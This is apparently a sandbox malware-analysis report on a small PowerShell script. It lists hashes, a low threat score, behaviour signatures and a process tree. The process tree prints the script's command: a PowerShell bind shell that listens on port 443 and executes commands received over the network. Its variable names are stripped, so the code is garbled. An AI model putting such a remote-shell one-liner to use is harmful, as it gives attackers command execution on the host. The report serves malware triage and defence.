Analysis
-
max time kernel
137s -
max time network
6s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
07-07-2020 13:59
General
-
Target
KfhizGC7.ps1
-
Size
594B
-
MD5
5f3a4a7943f554bd8f39a48cc9b2faa9
-
SHA1
fb28d0ac2f50899a7170029120027db996b488fd
-
SHA256
5f5c5f00a84e03684b736c76b1294a9825966ace8f628e7e65dffba8d6bdc7e6
-
SHA512
737e27f3ea569ccc893ebdc0b7a8c64409f1228d4266ce8371130432b50c42f7c687cc191a94c1dd94949e951dffa9d6c23ba910d5b0e88b25eb58c1c37cfdf7
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\KfhizGC7.ps11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c " = New-Object System.Net.Sockets.TcpListener( '0.0.0.0',443);.start(); = .AcceptTcpClient(); = nt.GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, es.Length)) -ne 0){; = (New-Object -TypeName System.Text.ASCIIEncoding).GetString (,0, ); = (iex 2>&1 | Out-String ); = + 'PS ' + (pwd).Path + '> '; = ([text.encoding]::ASCII).GetBytes(); eam.Write(,0,.Length);.Flush()};.Close();.Sto p()"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
memory/1552-0-0x0000000000000000-mapping.dmp